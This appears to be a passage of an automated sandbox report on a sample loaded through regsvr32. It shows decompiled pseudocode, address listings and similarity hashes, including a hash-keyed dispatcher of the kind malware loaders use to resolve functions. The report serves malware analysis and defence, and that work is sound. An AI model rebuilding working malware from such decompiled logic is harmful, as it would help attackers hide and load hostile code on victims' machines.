                          0x7ff88c07e463
                          0x7ff88c07e471
                          0x7ff88c07e475
                          0x7ff88c07e479
                          0x7ff88c07e483
                          0x7ff88c07e496
                          0x7ff88c07e49a
                          0x7ff88c07e49f
                          0x7ff88c07e4a3
                          0x7ff88c07e4b2
                          0x7ff88c07e4ce

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.389521559.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000003.00000002.389503061.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389771313.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389956635.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389983202.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390104358.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390153087.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff88c070000_regsvr32.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                          • String ID:
                          • API String ID: 1239891234-0
                          • Opcode ID: 07dcb6749cf727804a818c63ef9eb218394f6ec07e419224f6cd5021fde535cb
                          • Instruction ID: 0c7b21463160054d03d981d111d5a7f7e7897e70b88482e26c61dd0242a9fa81
                          • Opcode Fuzzy Hash: 07dcb6749cf727804a818c63ef9eb218394f6ec07e419224f6cd5021fde535cb
                          • Instruction Fuzzy Hash: 44316036608B8186EB64CF25E8443AE73A4FB997D4F504136EA9D47BA8DF3CC555CB00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 46%
                          			E003D7FD4(void* __ecx, void* __ebp, void* __fp0, long long* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, char* __r8) {
                          				void* __rdi;
                          				signed int _t34;
                          				long long* _t41;
                          				long long* _t42;
                          				long long* _t48;
                          				void* _t53;
                          				long long* _t54;
                          				void* _t55;
                          				signed int _t56;
                          				void* _t67;
                          				void* _t77;
                          				void* _t101;
                          				char* _t103;
                          				long long* _t107;
                          				long long _t109;
                          				void* _t110;
                          				void* _t112;
                          				void* _t113;
                          				signed long long _t125;
                          
                          				_t79 = __rbx;
                          				_t78 = __rax;
                          				_t77 = __fp0;
                          				_t67 = __ebp;
                          				_t55 = __ecx;
                          				 *((long long*)(_t112 + 8)) = __rbx;
                          				 *((long long*)(_t112 + 0x18)) = _t109;
                          				 *((long long*)(_t112 + 0x20)) = __rsi;
                          				_push(_t125);
                          				_t113 = _t112 - 0x40;
                          				r14d =  *0x3dd450;
                          				_t110 = __rcx;
                          				_t82 =  *0x3dd458;
                          				_t107 =  *((intOrPtr*)( *0x3dd458 + 8));
                          				r12d = 0;
                          				_t34 = r14d ^ _t56;
                          				_t103 = __r8;
                          				if(_t34 == 0x139d2b8d) {
                          					L20:
                          					_t79 =  *(_t110 + 0x50);
                          					__eflags = _t79;
                          					if(_t79 == 0) {
                          						_t54 = 0x426;
                          					} else {
                          						E003D908C(_t34, 0xf2d20ec6,  *((intOrPtr*)(_t82 + 0x18)));
                          						__eflags = _t78;
                          						if(_t78 == 0) {
                          						} else {
                          							 *_t78();
                          						}
                          						asm("sbb ebx, ebx");
                          						_t54 = _t53 + 0x4ce;
                          					}
                          					__eflags = r12d;
                          					if(r12d == 0) {
                          						L43:
                          						if( *((long long*)(_t113 + 0x80)) != 0 && _t54 != 0x3e5) {
                          							r8d = _t54;
                          							E003D6AC0(_t55, _t77, _t78, _t79, _t110,  *((intOrPtr*)(_t113 + 0x80)), _t107, _t110);
                          						}
                          						return _t54;
                          					} else {
                          						__eflags = _t54 - 0x426;
                          						if(_t54 != 0x426) {
                          							goto L43;
                          						}
                          						L31:
                          						_t54 = 0x57;
                          						__eflags = _t103;
                          						if(_t103 == 0) {
                          							L37:
                          							r12d = 1;
                          							__eflags = _t54;
                          							if(_t54 != 0) {
                          								goto L43;
                          							}
                          							L38:
                          							_t107 =  *(_t110 + 0x50);
                          							__eflags = _t107;
                          							if(_t107 == 0) {
                          								_t54 = 0x426;
                          							} else {
                          								 *(_t110 + 0x50) =  *(_t110 + 0x50) & 0x00000000;
                          								_t78 =  *0x3dd458;
                          								_t79 =  *((intOrPtr*)( *0x3dd458 + 8));
                          								E003D2874(_t55,  *((intOrPtr*)( *0x3dd458 + 8)), _t107, _t103, _t107);
                          								HeapFree(??, ??, ??);
                          								_t54 = 0;
                          							}
                          							__eflags = r12d;
                          							if(r12d != 0) {
                          								_t27 = _t113 + 0x30; // 0x31
                          								__eflags = 0;
                          								_t54 = E003D9214(_t79, _t27, _t103, _t107, _t110,  *((intOrPtr*)(_t110 + 0x38)), _t110 + 0x50);
                          							}
                          							goto L43;
                          						}
                          						__eflags =  *_t103;
                          						if( *_t103 == 0) {
                          							goto L37;
                          						}
                          						L003D487A();
                          						_t41 = E003D5448(_t55, _t67, _t78, _t79, _t103, _t113 + 0x30, _t107, _t110);
                          						__eflags = _t41;
                          						if(_t41 != 0) {
                          							L36:
                          							_t54 = 0;
                          							__eflags = 0;
                          							goto L37;
                          						}
                          						_t42 = E003D672C(_t41, 0, _t103, _t113 + 0x68);
                          						__eflags = _t42;
                          						if(_t42 == 0) {
                          							goto L37;
                          						}
                          						asm("ror ax, 0x8");
                          						 *((short*)(_t113 + 0x32)) =  *(_t113 + 0x68) & 0x0000ffff;
                          						goto L36;
                          					}
                          				}
                          				if(_t34 == 0x15f5a8c2) {
                          					__eflags = r9d;
                          					if(r9d == 0) {
                          						L15:
                          						_t54 = 0x57;
                          						goto L43;
                          					}
                          					E003D85CC(__rbx, __r8, __rdx, _t107);
                          					__eflags = _t78;
                          					if(__eflags == 0) {
                          						L14:
                          						_t54 = 8;
                          						goto L43;
                          					}
                          					_t101 = 0x3d5c80;
                          					L11:
                          					 *(_t113 + 0x20) =  *(_t113 + 0x20) & _t125;
                          					_t48 = E003D14B8(_t53, _t55, _t67, __eflags, _t78, _t79, _t110, _t101, _t107, _t78);
                          					_t54 = _t48;
                          					__eflags = _t48;
                          					if(_t48 != 0) {
                          						HeapFree();
                          					} else {
                          						_t54 = 0x3e5;
                          					}
                          					goto L43;
                          				}
                          				if(_t34 == 0x2f77acf9) {
                          					r12d = 1;
                          					goto L20;
                          				}
                          				if(_t34 == 0x48e12436) {
                          					goto L38;
                          				}
                          				if(_t34 == 0x4d382929) {
                          					goto L31;
                          				}
                          				if(_t34 == 0xb016dc39) {
                          					E003D908C(_t34, 0xd97160e4,  *((intOrPtr*)(_t82 + 0x18)));
                          					__eflags = _t78;
                          					if(_t78 != 0) {
                          						 *_t78();
                          					}
                          					_t54 = 0;
                          					goto L43;
                          				}
                          				if(_t34 == 0xb057dfc9) {
                          					__eflags = r9d;
                          					if(r9d == 0) {
                          						goto L15;
                          					}
                          					E003D85CC(__rbx, __r8, __rdx, _t107);
                          					__eflags = _t78;
                          					if(__eflags == 0) {
                          						goto L14;
                          					}
                          					_t101 = 0x3d34a4;
                          					goto L11;
                          				} else {
                          					_t5 = _t125 + 1; // 0x1
                          					_t54 = _t5;
                          					goto L43;
                          				}
                          			}






















                          0x003d7fd4
                          0x003d7fd4
                          0x003d7fd4
                          0x003d7fd4
                          0x003d7fd4
                          0x003d7fd4
                          0x003d7fd9
                          0x003d7fde
                          0x003d7fe4
                          0x003d7fe8
                          0x003d7fec
                          0x003d7ff3
                          0x003d7ff6
                          0x003d7ffd
                          0x003d8004
                          0x003d8007
                          0x003d8009
                          0x003d8011
                          0x003d80ef
                          0x003d80ef
                          0x003d80f3
                          0x003d80f6
                          0x003d814a
                          0x003d80f8
                          0x003d8101
                          0x003d8106
                          0x003d8109
                          0x003d810b
                          0x003d8111
                          0x003d8111
                          0x003d8140
                          0x003d8142
                          0x003d8142
                          0x003d814f
                          0x003d8152
                          0x003d821b
                          0x003d8224
                          0x003d8236
                          0x003d823c
                          0x003d823c
                          0x003d825b
                          0x003d8158
                          0x003d8158
                          0x003d815e
                          0x00000000
                          0x00000000
                          0x003d8164
                          0x003d8164
                          0x003d8169
                          0x003d816c
                          0x003d81be
                          0x003d81be
                          0x003d81c4
                          0x003d81c6
                          0x00000000
                          0x00000000
                          0x003d81c8
                          0x003d81c8
                          0x003d81cc
                          0x003d81cf
                          0x003d81fb
                          0x003d81d1
                          0x003d81d1
                          0x003d81d6
                          0x003d81e0
                          0x003d81e4
                          0x003d81f1
                          0x003d81f7
                          0x003d81f7
                          0x003d8200
                          0x003d8203
                          0x003d820d
                          0x003d8212
                          0x003d8219
                          0x003d8219
                          0x00000000
                          0x003d8203
                          0x003d816e
                          0x003d8171
                          0x00000000
                          0x00000000
                          0x003d8185
                          0x003d8192
                          0x003d8197
                          0x003d8199
                          0x003d81bc
                          0x003d81bc
                          0x003d81bc
                          0x00000000
                          0x003d81bc
                          0x003d81a5
                          0x003d81aa
                          0x003d81ac
                          0x00000000
                          0x00000000
                          0x003d81b3
                          0x003d81b7
                          0x00000000
                          0x003d81b7
                          0x003d8152
                          0x003d801c
                          0x003d8115
                          0x003d8118
                          0x003d80bf
                          0x003d80bf
                          0x00000000
                          0x003d80bf
                          0x003d8120
                          0x003d8128
                          0x003d812b
                          0x003d80b5
                          0x003d80b5
                          0x00000000
                          0x003d80b5
                          0x003d812d
                          0x003d807a
                          0x003d8082
                          0x003d808d
                          0x003d8092
                          0x003d8094
                          0x003d8096
                          0x003d80aa
                          0x003d8098
                          0x003d8098
                          0x003d8098
                          0x00000000
                          0x003d8096
                          0x003d8027
                          0x003d80e9
                          0x00000000
                          0x003d80e9
                          0x003d8032
                          0x00000000
                          0x00000000
                          0x003d803d
                          0x00000000
                          0x00000000
                          0x003d8048
                          0x003d80d2
                          0x003d80d7
                          0x003d80da
                          0x003d80e0
                          0x003d80e0
                          0x003d80e2
                          0x00000000
                          0x003d80e2
                          0x003d804f
                          0x003d805b
                          0x003d805e
                          0x00000000
                          0x00000000
                          0x003d8066
                          0x003d806e
                          0x003d8071
                          0x00000000
                          0x00000000
                          0x003d8073
                          0x00000000
                          0x003d8051
                          0x003d8051
                          0x003d8051
                          0x00000000
                          0x003d8051

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.389034131.00000000003D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_3d0000_regsvr32.jbxd
                          Similarity
                          • API ID: FreeHeap
                          • String ID: ))8M$6$H$lJu
                          • API String ID: 3298025750-2816507560
                          • Opcode ID: e943009c52edc3a9ff9218d50e7176983ae45fe1d98091206747ec6dadb96f7e
                          • Instruction ID: 8e5c34c1107cb35dddc0784ab3e2561e3d64d5670ad59413b12e6faed054e641
                          • Opcode Fuzzy Hash: e943009c52edc3a9ff9218d50e7176983ae45fe1d98091206747ec6dadb96f7e
                          • Instruction Fuzzy Hash: 9051ED23304B8182EB17DB67F88036A6365FB847C4F594423EE494BB59DF78E94AC301
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 64%
                          			E00007FF87FF88C07F964(void* __edx, intOrPtr* __rax, long long __rbx, intOrPtr* __rcx, long long __rdx, long long _a8, void* _a16, long long _a24, intOrPtr _a26, long long _a32) {
                          				long long _v72;
                          				intOrPtr _v80;
                          				void* _v88;
                          				long long _v96;
                          				long long _v104;
                          				void* __rdi;
                          				void* __rsi;
                          				void* __rbp;
                          				void* _t33;
                          				void* _t37;
                          				intOrPtr* _t66;
                          				signed long long _t68;
                          				long long _t70;
                          				long long _t72;
                          				long long _t78;
                          				void* _t83;
                          				void* _t90;
                          				long long _t104;
                          				long long _t108;
                          				void* _t110;
                          				intOrPtr* _t112;
                          				void* _t114;
                          				void* _t117;
                          				intOrPtr _t129;
                          				void* _t131;
                          				void* _t132;
                          				signed long long _t133;
                          				signed long long _t134;
                          				signed long long _t137;
                          				intOrPtr* _t138;
                          
                          				_t66 = __rax;
                          				_a8 = __rbx;
                          				_a16 = __rdx;
                          				if (__rdx != 0) goto 0x8c07f9a0;
                          				_t33 = E00007FF87FF88C07E6A0(__rax);
                          				_t3 = _t108 + 0x16; // 0x16
                          				 *__rax = _t3;
                          				E00007FF87FF88C07E580(_t33);
                          				goto 0x8c07fb40;
                          				asm("xorps xmm0, xmm0");
                          				 *((long long*)(__rdx)) = _t108;
                          				asm("movdqu [ebp-0x20], xmm0");
                          				_v72 = _t108;
                          				if ( *__rcx == _t108) goto 0x8c07fa0b;
                          				_a24 = 0x3f2a;
                          				_a26 = dil;
                          				E00007FF87FF88C083218( *__rcx,  &_a24);
                          				if (_t66 != 0) goto 0x8c07f9e2;
                          				r8d = 0;
                          				_t37 = E00007FF87FF88C07FB70(__rcx,  *__rcx,  &_a24, _t108, _t110, _t114, _t117,  &_v88);
                          				goto 0x8c07f9ee;
                          				0x8c07fc80();
                          				r14d = _t37;
                          				if (_t37 != 0) goto 0x8c07f9fe;
                          				goto 0x8c07f9b2;
                          				goto 0x8c07fb04;
                          				_t112 = _v88;
                          				_t129 = _v80;
                          				_a24 = _t108;
                          				_t68 = _t129 - _t112;
                          				_t137 = (_t68 >> 3) + 1;
                          				_t90 =  >  ? _t108 : _t68 + 7 >> 3;
                          				_t134 = _t133 | 0xffffffff;
                          				if (_t90 == 0) goto 0x8c07fa6d;
                          				_t70 = _t134 + 1;
                          				if ( *((intOrPtr*)( *_t112 + _t70)) != dil) goto 0x8c07fa4e;
                          				if (_t108 + 1 != _t90) goto 0x8c07fa48;
                          				_a24 = _t108 + 1 + _t70;
                          				r8d = 1;
                          				E00007FF87FF88C07D6D0(_t137, _t108 + 1 + _t70, _t108 + 1);
                          				_t78 = _t70;
                          				if (_t70 == 0) goto 0x8c07fafd;
                          				_t104 = _t70 + _t137 * 8;
                          				_t138 = _t112;
                          				_v96 = _t104;
                          				_a32 = _t104;
                          				if (_t112 == _t129) goto 0x8c07faf3;
                          				_v104 = _t78 - _t112;
                          				_t131 = _t134 + 1;
                          				if ( *((intOrPtr*)( *_t138 + _t131)) != dil) goto 0x8c07faad;
                          				_t132 = _t131 + 1;
                          				if (E00007FF87FF88C083144(0, _t104, _t78, _t104, _t104 - _t104 + _a24, _t132) != 0) goto 0x8c07fb58;
                          				_t72 = _a32;
                          				 *((long long*)(_v104 + _t138)) = _t72;
                          				_a32 = _t72 + _t132;
                          				if (_t138 + 8 != _t129) goto 0x8c07faa7;
                          				r14d = 0;
                          				 *_a16 = _t78;
                          				E00007FF87FF88C07E114(_a16, _v104);
                          				_t83 =  >  ? _t108 : _t129 - _t112 + 7 >> 3;
                          				if (_t83 == 0) goto 0x8c07fb35;
                          				E00007FF87FF88C07E114(_a16,  *_t112);
                          				if (_t108 + 1 != _t83) goto 0x8c07fb21;
                          				E00007FF87FF88C07E114(_a16, _t112);
                          				return r14d;
                          			}

































                          0x7ff88c07f964
                          0x7ff88c07f964
                          0x7ff88c07f969
                          0x7ff88c07f988
                          0x7ff88c07f98a
                          0x7ff88c07f98f
                          0x7ff88c07f992
                          0x7ff88c07f994
                          0x7ff88c07f99b
                          0x7ff88c07f9a0
                          0x7ff88c07f9a3
                          0x7ff88c07f9a9
                          0x7ff88c07f9ae
                          0x7ff88c07f9b2
                          0x7ff88c07f9bb
                          0x7ff88c07f9c1
                          0x7ff88c07f9c5
                          0x7ff88c07f9d0
                          0x7ff88c07f9d6
                          0x7ff88c07f9db
                          0x7ff88c07f9e0
                          0x7ff88c07f9e9
                          0x7ff88c07f9ee
                          0x7ff88c07f9f3
                          0x7ff88c07f9fc
                          0x7ff88c07fa06
                          0x7ff88c07fa0b
                          0x7ff88c07fa12
                          0x7ff88c07fa1c
                          0x7ff88c07fa20
                          0x7ff88c07fa2d
                          0x7ff88c07fa3b
                          0x7ff88c07fa3f
                          0x7ff88c07fa46
                          0x7ff88c07fa4e
                          0x7ff88c07fa55
                          0x7ff88c07fa67
                          0x7ff88c07fa69
                          0x7ff88c07fa6d
                          0x7ff88c07fa79
                          0x7ff88c07fa7e
                          0x7ff88c07fa84
                          0x7ff88c07fa86
                          0x7ff88c07fa8a
                          0x7ff88c07fa8d
                          0x7ff88c07fa94
                          0x7ff88c07fa9b
                          0x7ff88c07faa3
                          0x7ff88c07faad
                          0x7ff88c07fab4
                          0x7ff88c07fab9
                          0x7ff88c07facd
                          0x7ff88c07fad3
                          0x7ff88c07fadf
                          0x7ff88c07faea
                          0x7ff88c07faf1
                          0x7ff88c07faf7
                          0x7ff88c07fafa
                          0x7ff88c07faff
                          0x7ff88c07fb18
                          0x7ff88c07fb1f
                          0x7ff88c07fb24
                          0x7ff88c07fb33
                          0x7ff88c07fb38
                          0x7ff88c07fb57

                          APIs
                          • _invalid_parameter_noinfo.LIBCMT ref: 00007FF88C07F994
                            • Part of subcall function 00007FF88C07E5A0: IsProcessorFeaturePresent.KERNEL32(00007FF88C080B95), ref: 00007FF88C07E5A9
                            • Part of subcall function 00007FF88C07E5A0: GetCurrentProcess.KERNEL32(00007FF88C080B95), ref: 00007FF88C07E5CD
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.389521559.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000003.00000002.389503061.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389771313.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389956635.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389983202.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390104358.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390153087.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff88c070000_regsvr32.jbxd
                          Similarity
                          • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                          • String ID: *?$.
                          • API String ID: 4036615347-3972193922
                          • Opcode ID: 4cda8f812522c02942c11826489b886558005b358df05b685b12336f39f260f7
                          • Instruction ID: 100939bfa5983ec9180eb91ef71791c8c740c5b9116cce3bc6e37a4d42781363
                          • Opcode Fuzzy Hash: 4cda8f812522c02942c11826489b886558005b358df05b685b12336f39f260f7
                          • Instruction Fuzzy Hash: CF510262B15B9A85EF18DFA6D8010BD67A4FB69BD8B448532DE1D17B89EF3DD042C300
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 87%
                          			E00007FF87FF88C07E9E0(intOrPtr* __rax, long long __rbx, signed int* __rcx, char* __rdx, long long _a8) {
                          				long long _v24;
                          				signed int _t21;
                          				signed int _t24;
                          				void* _t39;
                          				char _t42;
                          				void* _t47;
                          				void* _t63;
                          				signed int _t69;
                          				signed int _t74;
                          				intOrPtr* _t89;
                          				char* _t93;
                          				char* _t94;
                          				char* _t96;
                          				char* _t98;
                          				char* _t99;
                          				void* _t100;
                          				void* _t101;
                          				void* _t119;
                          
                          				_t89 = __rax;
                          				_a8 = __rbx;
                          				_t21 =  *0x8c0b4dc8; // 0x0
                          				_v24 = __rcx;
                          				asm("movsd xmm0, [esp+0x20]");
                          				asm("movsd [edi], xmm0");
                          				__rcx[2] = 0;
                          				__rcx[1] = _t21;
                          				if ( *__rdx != 0x20) goto 0x8c07ea1a;
                          				_t93 = __rdx + 1;
                          				if ( *_t93 == 0x20) goto 0x8c07ea12;
                          				if ( *_t93 == 0x61) goto 0x8c07ea40;
                          				if ( *_t93 == 0x72) goto 0x8c07ea35;
                          				if ( *_t93 != 0x77) goto 0x8c07ec5d;
                          				 *__rcx = 0x301;
                          				goto 0x8c07ea46;
                          				 *__rcx =  *__rcx & 0;
                          				__rcx[1] = 1;
                          				goto 0x8c07ea4d;
                          				 *__rcx = 0x109;
                          				__rcx[1] = 2;
                          				_t94 = _t93 + 1;
                          				r9b = 0;
                          				r11b = 0;
                          				r10b = 0;
                          				r8b = 0;
                          				if ( *_t94 == 0) goto 0x8c07eb8b;
                          				_t42 =  *_t94;
                          				_t63 = _t42 - 0x53;
                          				if (_t63 > 0) goto 0x8c07eb0c;
                          				if (_t63 == 0) goto 0x8c07eafc;
                          				if (_t63 == 0) goto 0x8c07eb79;
                          				if (_t63 == 0) goto 0x8c07ead0;
                          				if (_t63 == 0) goto 0x8c07eac8;
                          				if (_t63 == 0) goto 0x8c07eab6;
                          				_t47 = _t42 - 0xfffffffffffffff2;
                          				if (_t63 == 0) goto 0x8c07eaad;
                          				if (_t47 != 4) goto 0x8c07ec5d;
                          				if (r10b != 0) goto 0x8c07eb6d;
                          				 *__rcx =  *__rcx | 0x00000010;
                          				goto 0x8c07eb04;
                          				asm("bts dword [edi], 0x7");
                          				goto 0x8c07eb77;
                          				if (( *__rcx & 0x00000040) != 0) goto 0x8c07eb6d;
                          				goto 0x8c07eb75;
                          				r8b = 1;
                          				goto 0x8c07eb6d;
                          				if (r11b != 0) goto 0x8c07eb6d;
                          				_t24 =  *__rcx;
                          				r11b = 1;
                          				if ((_t24 & 0x00000002) != 0) goto 0x8c07eb6d;
                          				 *__rcx = _t24 & 0xfffffffe | 0x00000002;
                          				__rcx[1] = __rcx[1] & 0xfffffffc | 0x00000004;
                          				goto 0x8c07eb77;
                          				_t69 = r10b;
                          				if (_t69 != 0) goto 0x8c07eb6d;
                          				 *__rcx =  *__rcx | 0x00000020;
                          				r10b = 1;
                          				goto 0x8c07eb79;
                          				if (_t69 == 0) goto 0x8c07eb65;
                          				if (_t69 == 0) goto 0x8c07eb56;
                          				if (_t69 == 0) goto 0x8c07eb44;
                          				if (_t69 == 0) goto 0x8c07eb38;
                          				if (_t47 - 0x3a != 6) goto 0x8c07ec5d;
                          				if (( *__rcx & 0x0000c000) != 0) goto 0x8c07eb6d;
                          				asm("bts eax, 0xe");
                          				goto 0x8c07eb75;
                          				if (r9b != 0) goto 0x8c07eb6d;
                          				asm("btr dword [edi+0x4], 0xb");
                          				goto 0x8c07eb4e;
                          				if (r9b != 0) goto 0x8c07eb6d;
                          				asm("bts dword [edi+0x4], 0xb");
                          				r9b = 1;
                          				goto 0x8c07eb79;
                          				_t74 =  *__rcx & 0x0000c000;
                          				if (_t74 != 0) goto 0x8c07eb6d;
                          				asm("bts eax, 0xf");
                          				goto 0x8c07eb75;
                          				asm("bt eax, 0xc");
                          				if (_t74 >= 0) goto 0x8c07eb71;
                          				goto 0x8c07eb79;
                          				asm("bts eax, 0xc");
                          				if (1 != 0) goto 0x8c07ea5e;
                          				if (r8b == 0) goto 0x8c07eb93;
                          				_t96 = _t94 + __rax + 1;
                          				if ( *_t96 == 0x20) goto 0x8c07eb90;
                          				if (r8b != 0) goto 0x8c07ebaf;
                          				if ( *_t96 != 0) goto 0x8c07ec5d;
                          				__rcx[2] = 1;
                          				goto 0x8c07ec6d;
                          				r8d = 3;
                          				if (E00007FF87FF88C081B40(_t47 - 0x3a, _t96, 0x8c09ed38, _t119) != 0) goto 0x8c07ec5d;
                          				goto 0x8c07ebd5;
                          				_t98 = _t96 + 4;
                          				if ( *_t98 == 0x20) goto 0x8c07ebd2;
                          				if ( *_t98 != 0x3d) goto 0x8c07ec5d;
                          				_t99 = _t98 + 1;
                          				if ( *_t99 == 0x20) goto 0x8c07ebdf;
                          				r8d = 5;
                          				if (E00007FF87FF88C081C08(1, _t89, _t99) != 0) goto 0x8c07ec0a;
                          				_t100 = _t99 + 5;
                          				asm("bts dword [edi], 0x12");
                          				goto 0x8c07ec53;
                          				r8d = 8;
                          				if (E00007FF87FF88C081C08(1, _t89, _t100) != 0) goto 0x8c07ec2d;
                          				_t101 = _t100 + 8;
                          				asm("bts dword [edi], 0x11");
                          				goto 0x8c07ec53;
                          				r8d = 7;
                          				if (E00007FF87FF88C081C08(1, _t89, _t101) != 0) goto 0x8c07ec5d;
                          				asm("bts dword [edi], 0x10");
                          				goto 0x8c07ec53;
                          				if ( *((char*)(_t101 + 8)) == 0x20) goto 0x8c07ec50;
                          				goto 0x8c07eb9d;
                          				_t39 = E00007FF87FF88C07E6A0(_t89);
                          				 *_t89 = 0x16;
                          				return E00007FF87FF88C07E580(_t39);
                          			}





















                          0x7ff88c07e9e0
                          0x7ff88c07e9e0
                          0x7ff88c07e9ea
                          0x7ff88c07e9fb
                          0x7ff88c07ea00
                          0x7ff88c07ea06
                          0x7ff88c07ea0a
                          0x7ff88c07ea0d
                          0x7ff88c07ea10
                          0x7ff88c07ea12
                          0x7ff88c07ea18
                          0x7ff88c07ea1d
                          0x7ff88c07ea22
                          0x7ff88c07ea27
                          0x7ff88c07ea2d
                          0x7ff88c07ea33
                          0x7ff88c07ea35
                          0x7ff88c07ea37
                          0x7ff88c07ea3e
                          0x7ff88c07ea40
                          0x7ff88c07ea46
                          0x7ff88c07ea4d
                          0x7ff88c07ea50
                          0x7ff88c07ea53
                          0x7ff88c07ea56
                          0x7ff88c07ea59
                          0x7ff88c07ea61
                          0x7ff88c07ea67
                          0x7ff88c07ea6a
                          0x7ff88c07ea6d
                          0x7ff88c07ea73
                          0x7ff88c07ea7c
                          0x7ff88c07ea85
                          0x7ff88c07ea8a
                          0x7ff88c07ea8f
                          0x7ff88c07ea91
                          0x7ff88c07ea94
                          0x7ff88c07ea99
                          0x7ff88c07eaa2
                          0x7ff88c07eaa8
                          0x7ff88c07eaab
                          0x7ff88c07eaad
                          0x7ff88c07eab1
                          0x7ff88c07eaba
                          0x7ff88c07eac3
                          0x7ff88c07eac8
                          0x7ff88c07eacb
                          0x7ff88c07ead3
                          0x7ff88c07ead9
                          0x7ff88c07eadb
                          0x7ff88c07eae0
                          0x7ff88c07eaec
                          0x7ff88c07eaf7
                          0x7ff88c07eafa
                          0x7ff88c07eafc
                          0x7ff88c07eaff
                          0x7ff88c07eb01
                          0x7ff88c07eb04
                          0x7ff88c07eb0a
                          0x7ff88c07eb0f
                          0x7ff88c07eb14
                          0x7ff88c07eb19
                          0x7ff88c07eb1e
                          0x7ff88c07eb23
                          0x7ff88c07eb30
                          0x7ff88c07eb32
                          0x7ff88c07eb36
                          0x7ff88c07eb3b
                          0x7ff88c07eb3d
                          0x7ff88c07eb42
                          0x7ff88c07eb47
                          0x7ff88c07eb49
                          0x7ff88c07eb4e
                          0x7ff88c07eb54
                          0x7ff88c07eb58
                          0x7ff88c07eb5d
                          0x7ff88c07eb5f
                          0x7ff88c07eb63
                          0x7ff88c07eb67
                          0x7ff88c07eb6b
                          0x7ff88c07eb6f
                          0x7ff88c07eb71
                          0x7ff88c07eb85
                          0x7ff88c07eb8e
                          0x7ff88c07eb90
                          0x7ff88c07eb96
                          0x7ff88c07eb9b
                          0x7ff88c07eba0
                          0x7ff88c07eba6
                          0x7ff88c07ebaa
                          0x7ff88c07ebaf
                          0x7ff88c07ebc6
                          0x7ff88c07ebd0
                          0x7ff88c07ebd2
                          0x7ff88c07ebd8
                          0x7ff88c07ebdd
                          0x7ff88c07ebdf
                          0x7ff88c07ebe5
                          0x7ff88c07ebe7
                          0x7ff88c07ebfe
                          0x7ff88c07ec00
                          0x7ff88c07ec04
                          0x7ff88c07ec08
                          0x7ff88c07ec0a
                          0x7ff88c07ec21
                          0x7ff88c07ec23
                          0x7ff88c07ec27
                          0x7ff88c07ec2b
                          0x7ff88c07ec2d
                          0x7ff88c07ec44
                          0x7ff88c07ec4a
                          0x7ff88c07ec4e
                          0x7ff88c07ec56
                          0x7ff88c07ec58
                          0x7ff88c07ec5d
                          0x7ff88c07ec62
                          0x7ff88c07ec7a

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.389521559.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000003.00000002.389503061.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389771313.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389956635.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389983202.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390104358.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390153087.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff88c070000_regsvr32.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID: $ $ $ $ $=$UTF-16LEUNICODE$UTF-8$a$ccs$r$w
                          • API String ID: 3215553584-2974328796
                          • Opcode ID: 3d3d684f05ca60b9351f6ae1519f0e4da1bcc7ff1a8d1dac3fd3f5df153a3e81
                          • Instruction ID: f0b2bf7eb0a0a44d839523c32f5bb024ddbf7d8b605cf142be3c687dc01552fc
                          • Opcode Fuzzy Hash: 3d3d684f05ca60b9351f6ae1519f0e4da1bcc7ff1a8d1dac3fd3f5df153a3e81
                          • Instruction Fuzzy Hash: 4F717E72D0E2469DFF6D4A24D65433A2E91BF237C4F149435CA3A465DDCB2EB820DB01
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 39%
